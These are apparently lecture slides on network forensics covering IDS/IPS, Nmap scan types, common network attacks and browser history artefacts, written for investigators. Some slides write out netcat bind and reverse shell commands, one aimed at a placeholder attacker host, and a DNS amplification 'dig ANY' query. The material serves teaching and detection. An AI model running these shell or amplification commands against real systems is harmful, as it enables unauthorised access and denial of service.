Computer forensics Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 2 specialized sniffers with the added capability of evaluating captured traffic to determine whether it is malicious or legitimate After rebranding Most IDS systems have become IPS systems Intrusion Prevention Systems Over the years, IDS/IPS product space has developed two separate niches: NIDS/NIPS monitor network traffic and alert on suspicious network events HIDS/HIPS monitor system events and alert on suspicious system activities 3 Network forensics 1
Computer forensics Are often a very good starting point in an investigation They detect potentially adverse events via network monitoring Chances are they have logged the incident that is investigated Unfortunately They can t always reconstruct a sequence of events and explain them to us at least not easily Still useful because: Logs contain details regarding illicit connections (or even attempts) that are not recorded anywhere else Can be configured to alert and log traffic that firewalls deem perfectly acceptable An investigator could potentially modify a NIDS/NIPS configuration to begin detecting events it wasn t previously configured to record NIDS/NIPS are well positioned as inspection points for network traffic 4 Rules Descriptions of how to compare a packet or stream with a known malicious traffic Alerts Lists of suspicious packets/streams Packet captures Certain NIDS/NIPS can be configured to capture suspicious packets and save them for later analysis not always configured to do this by default Other features: Higher-Layer Protocol Awareness Signature-Based Analysis Behavioral analysis 5 Types of Evidence Configuration Alert data Packet header and/or flow record information Packet payloads Activities correlated across multiple sensors NIDS/NIPS are specifically designed to sift through large amounts of network traffic and pick out specific events of interest particularly those that relate to security Useful as a starting point! 6 Network forensics 2
Computer forensics Commercial Check Point IPS-1 Cisco IPS Corero Network Security Enterasys IPS HP TippingPoint IPS IBM Security NIPS Sourcefire 3D System Open source Snort Bro Network Security Monitor 7 NIPS and NIDS open source Martin Roesch, 1998 free subscriptions for rules, three modes sniffer traffic logger NIDS detects probes or attacks: operating system fingerprinting attempts, common gateway interface, buffer overflows, server message block probes, stealth port scans, 8 Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 9 Network forensics 3
Computer forensics 1. Reconnaissance Browse various information sources for knowledge about the target system search engines, social networks, WHOIS databases or DNS 2. Enumeration (or scanning) systematically identifying systems and collecting information finding vulnerabilities (openings) in the target organization, such as: WiFi access points, lnternet gateways, available systems, vulnerable services 3. Exploitation actively exploit a security weaknesses in order to gain access to a system, cause denial-of-service, etc. 4. Post exploitation Once access to a system is obtained, an attacker can use this system: as a foothold for other attacks gather sensitive information (e.g. Passwords, certificates..) from the compromised system in order to compromise another one Usual steps of an attack 10 Scans SYN stealth scan Idle (zombie) scan FIN, Null, Xmas tree scans TCP connect() scan UDPs scan IP protocol scan Ping scan Attacks Teardrop ARP poisoning Password guessing Bind shell Reverse shell DoS attacks NTP DNS Heartbleed Important because: extremely often used in the enumeration phase of an attack Usually the only way of identifying and enumerating open services on a target network device There are various types of port scans have different impact on the target system and can be observed in different ways good attackers are known to delete logs and other useful traces of an exploit Analyzing network logs for port scans can be helpful in identifying the attack source because it usually occurs prior to an exploit (days, weeks or more..) it is possible that an attacker forgets (or can t) delete such traces 12 Network forensics 4
Computer forensics Most famous tool: Nmap Capable of conducting various types of port scans and other identification techniques often used by attackers: OS identification, service identification, checking for known vulnerabilities» limited but sometimes useful https://nmap.org/bennieston-tutorial Zenmap A GUI interface for nmap no additional features except for GUI Our focus is on identifying the various port scanning methods 13 14 Leverage the 3 way TCP handshake 1. 1 Client sends SYNchronize to an TCP open port that has a service bound to it Example: HTTClient P (port 80), SMTP (25), POP3 (110) or SSH (22) 2. 2 Serverside will respond with SYN ACK I ACKnowledge your SYN and I want to SYNchronize also 3. 3 Client will answer to the SYN ACK with an ACK Client 3 1 2 Server 15 Network forensics 5
Computer forensics just initiates and closes (RST) connection Attacker Target SYN SYN, ACK RST 16 The job of a firewall is to protect a system from unwanted packets that could harm the system e.g. an attacker is conducting a port scan against port 81 there is no service running on this port, so using a firewall to block access to it is the best practice A filtered port result from Nmap indicates that the port has not responded at all the SYN packet has simply been dropped by the firewall 17 closed ports most commonly indicate that there is no service running on the port BUT the firewall has allowed the connection to go through to the server It can also mean there is no firewall present, at all 18 Network forensics 6
Computer forensics This is what attackers are looking for when using port scans An open service (port) could be a publicly accessible service that is by its nature supposed to be accessible but, it could also be a back-end service that does not need to be publicly accessible and therefore should be blocked by a firewall 19 SYN Stealth Scan Is the example explained in the previous slide Explained in more detail in the following slides: TCP connect() Scan FIN, Null and Xmas Tree Scans Ping Scan IP Protocol Scans UDP scans Idle scan (or zombie scan) advanced, highly stealthed technique, where no packets are sent to the target identifying attacker s machine directly rather third (innocent) computer is involved» by sending packets to the target» forged to look like they came from third computer More information here: https://nmap.org/book/idlescan.html 20 These scans are called connect() scans because UNIX sockets programming uses a system call named connect() to begin a TCP connection to a remote site If connect() succeeds a connection was made If it fails the connection could not be made» due to remote system is offline, port is closed, or some other error occurred along the way... Very effective - provides a clear picture of the ports you can and cannot access If a connect() scan lists a port as open, you can definitely connect to it because, that is what the scanning computer just did! Major drawback to this kind of scan the scan is very easy to be detected on the system being scanned firewall or intrusion detection system will log all connect() attempts to every port on the system (and will almost always trigger a warning!) For this reason, the SYN Stealth Scan was developed 21 Network forensics 7
Computer forensics Many of modern firewalls and IDS detect SYN scans, but: 1. The FIN scan sends a packet with only the FINal flag set 2. The Xmas Tree scan sets the FIN, URGand PUSH flags 3. The Null scan sends a packet with no flags switched on Because: closedport will respond with RST on all these scans open port will ignore them waiting SYN first But Windows, does not follow RFC 793 and ignores these packets even on closed ports so, if you also run SYN Stealth you can tell this is a Windows system 22 23 Send 0-byte UDP packets to each target port Receipt of an ICMP Port Unreachable message signifies the port is closed, otherwise it is assumed open A major problem with this technique when a firewall blocks outgoing ICMP Port Unreachable messages, the port will appear open These false-positives are hard to distinguish from real open ports. Another disadvantage with UDP scanning is the speed at which it can be performed Most operating systems limit the number of ICMP Port Unreachable messages which can be generated in a certain time period, thus slowing the speed of an UDP scan 24 Network forensics 8
Computer forensics attempt to determine which IP protocols target supports sends a raw IP packet without additional protocol header to each port on the target machine Receipt of an ICMP Protocol Unreachable message tells us that the port is not in use, otherwise it is assumed open Not all hosts send ICMP Protocol Unreachable messages These may include firewalls, AIX, HP-UX and Digital UNIX These machines will report all protocols open! This scan type also falls victim to the ICMP limited rate, the same way as the UDP scans however, since only 256 protocols are possible 8-bit field for IP protocol in the IP header it should not take too long 25 lists the hosts within the specified range that responded to a ping It allows an attacker to detect which computers are online, rather than which ports are open Methods commonly used for ping sweeping: Sending an ICMP ECHO REQUEST (ping request) packet to the destination system If an ICMP ECHO REPLY is received, the system is up, and ICMP packets are not blocked. TCP Ping sends either a SYN or an ACK packet to any port (80 is the default) on the remote system If RST, or a SYN/ACK, is returned, then the remote system is online If the remote system does not respond, either it is offline, or the chosen port is filtered,» and thus not responding to anything 26 Scans SYN stealth scan Idle (zombie) scan FIN, Null, Xmas tree scans TCP connect() scan UDPs scan IP protocol scan Ping scan Attacks Teardrop ARP poisoning Password guessing Bind shell Reverse shell DoS attacks NTP DNS Heartbleed Network forensics 9
Computer forensics A teardrop attack is a denial of service (DoS) attack Conducted by targeting TCP/IP fragmentation reassembly codes This attack causes fragmented packets to overlap one another on the target host the host attempts to reconstruct them during the process but fails Gigantic payloads are sent to the machine that is being targeted, causing system crashes 28 One of the fields in an IP header is the fragment offset field It indicates the starting position (offset) of the data contained in a fragmented packet relative to the data in the original packet If the sum of the offset and size of one fragmented packet differsfrom that of the next fragmented packet, the packets overlap When this happens, a servervulnerable to teardrop attacks is unable to reassemble the packets resulting in a denial-of-service condition 29 30 Network forensics 10
Computer forensics Works by sending unsolicited ARP messages that contain the IP address of a network resource such as the default gateway, or a DNS server and replaces the real MAC address of the network resource with its own (attacker s) MAC address Network devices (by design) use new information and overwrite any existing ARP data for that IP address As the consequence, all packets sent to legitimate system will be instead delivered to the attacker The attacker then takes the role of the man in the middle Any traffic destined for the legitimate resource is sent through the attacking system As this attack occurs on the lower levels of the OSI model, the end-user is oblivious to the attack occurrence 31 32 Online password guessing Often used method of gaining access to a victim system/account It is a very loud way of trying to gain access a lot of network traffic is generated it is easy to spot in network traces a lot of authentication requests being» answered with an error» sent in a small time frame (e.g. 5 seconds) 33 Network forensics 11
Computer forensics 34 How does an attacker gain access to a vulnerable system? What happens when an attacker exploits a vulnerability? No easy (or unique answer) but for the most part, an attacker whishes to gain remote code execution ability This way they can run ANY command on the victim system and do anything with that computer This is accomplished by exploiting some vulnerability which allows remote code execution AND instructing the victim to start a shell with which an attacker can issue more commands without having to exploit the same vulnerability again Shell types: Bind shell Reverse shell 35 bind an application(e.g. /bin/bash) to a TCP/UDP port any machine that connects to this port will be presented with the application that was bind-ed with the same privileges of the user that bind-ed the application A bind shell simply opens up a port on the victim and binds the desired application Example: nc-lvvp1234 -e cmd.exe will connect cmd.exe to port 1234 from attacking machine nc IP_addr-of_victim 1234 36 Network forensics 12
Computer forensics gaining access to a remote computer and privilege to execute commands 37 With a classical bind shell The attacker needs to connect to the shell Which means the victim needs to open this port Not a problem this is done with the exploit However if there is a firewall protecting the victim it will most likely block any incoming traffic, and thus block the attacker s attempt to connect even though the exploit was successfully triggered! 38 Instead of using a bind shell And forcing a victim to open his port, and then try to connect to it An attacker can instruct the victim to start the connection and connect to the attacker thus bypassing a firewall since usually firewallsare configured to pass connections which are initiated from within the protected area on target computer attacker forces command nc IP_attackers 1234 e cmd.exe attacker on his computer executes nc -l 1234 39 Network forensics 13
Computer forensics 40 DoS are an attempt to make a machine or network unavailableto its intended users They present one of the most significant threats to assurance of dependable and secure information systems Very limited defense mechanisms One of the most often used attacks Requires only a lot of bandwidth but, no need for infrastructure or knowledge Can be bought easily via underground markets DDoS Distributed DoS many (third party) computers attack the victim very difficult to defend or counteract 41 Flood attacks Using Amplification attacks NTP DNS Protocol vulnerability exploitations attacks Malformed packet attacks e.g. Teardrop explained earlier 42 Network forensics 14
Computer forensics A type of reflection attack Reflection attacks involve eliciting a response from a legitimate (third party) server to a spoofed IP address (victim s) The attacker sends a packet to a legitimate, third party server with a forged IP address (the victim s) the server replies to victim s address similar to mail ordering to the address of your victim NTP amplification an attacker repeatedly sends the get monlist request to an NTP server, while spoofing the requesting server s IP address to that of the victim server The NTP server responds by sending the list to the spoofed IP address This response is much larger than the request, thus amplifying the amount of traffic directed at the target server and ultimately leading to a degradation of service for legitimate requests 43 44 There are two criteria for a good amplification attack vector: query can be set with a spoofed source address via a protocol like ICMP or UDP that does not require a handshake the response to the query is significantly larger than the query itself DNS is a core, ubiquitous Internet service that meets these criteria and therefore has become the largest source of amplification attacks DNS queries are typically transmitted over UDP as a result, their source attribute can be spoofed and the receiver has no way of determining its veracity before responding DNS is capable of generating a much larger response than query 45 Network forensics 15
Computer forensics For example: the following (tiny - 64 byte ) query: dig ANY isc.org @x.x.x.x where x.x.x.xis the IP of an open DNS resolver will result in a response that is about 3.200 bytes long a 64 byte query resultedin a 3.200 byte response In other words, an attacker is able to achieve a 50x amplification over whatever traffic they can initiate to an open DNS resolver requests can be sent not only to one DNS server but rather to many 46 47 a vulnerability in the popular OpenSSL cryptographic software library it enables an attacker to steal the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet SSL/TLS provides communication security and privacy over the Internet for applications such as: web, email, instant messaging (IM) and some virtual private networks (VPNs) The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software This, in turn, can compromise the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content which, in turn, allows attackers to eavesdropon communications, steal data directly from the services and users and to impersonateservices and users 48 Network forensics 16
Computer forensics How does heartbleed work? It exploits a bug in the SSL heartbeat protocol The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation the heartbeat keeps the context between the peers alive hence the keep-alive nomenclature How it works? a heartbeat message is sent with some provisional data the peer simply copies this data and sends it back 49 An attacker can control the heartbeat size and structure it to be larger than expected for example: send 1byte, but claim you are sending 64k Send it to the target server using TCP on port 443 and receive a response that contains up to 64kb data one byte will be yours, but the rest to 64k will be memory content in a memory allocation outside the bounds of what the heartbeat should be able to access Do it again with a different heartbeat size, get another 64kb response from another memory space etc.. Over time, the attacker can reassemble the whole victim s memory 64kb at a time and gain access to sensitive information: passwords, private keys etc...» basically anything in the memory 50 struct { HeartbeatMessageType type; uint16 payload_length; opaque payload[heartbeatmessage.pay load_length]; opaque padding[padding_length]; } HeartbeatMessage; 51 Network forensics 17
Computer forensics A (lengthy) explanation and PoC code can be found at: http://www.garage4hackers.com/entry.php?b=2551 A forensic investigator, needs to notice the following: Most exploits will send a heartbeat message which in hexadecimal representation looks like this: 1803020003014000 This is the hexadecimal representation for the HeartbeatMessage struct on the previous slide it is present in most heartbeat attacks 52 Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 53 Searching for evidence left by Web browsing activity is typically a crucial component of digital forensic investigations Almost every activity a user performs while using a Web browser leaves a trace on the computer even searching for information using a Web browser Therefore, when an investigator analyzes a computer this evidence can provide useful information cache, history, cookies, download list useful because contains evidence for Web sites visited, has time and frequency of access, contains search engine keywords used 54 Network forensics 18
Computer forensics Each web browser has its own location Internet Explorer Versions 4 to 9 use the Internet Explorer History File Format (or MSIE 4-9 Cache File format) The Cache Files commonly named index.dat are used to store both cache and historical information Version 10 C:\Users\%USER%\AppData\Local\Microsoft\Windows\WebCache\ The WebCacheV01.dat and WebCacheV24.dat files are in the Extensible Storage Engine (ESE) Database File (EDB) format Firefox stores the history of visited sites in a file named places.sqlite Usually at: C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\%PROFILE%.default an SQLite file, easily browsable using the tool SQLiteBrowser http://sqlitebrowser.org/ 55 56 This was merely a short overview of some attacks and vulnerabilities Each day this list grows The examples in this course are meant to provide you with the tools and knowledge necessary to handle new challenges on your own 57 Network forensics 19
Computer forensics Network forensics 20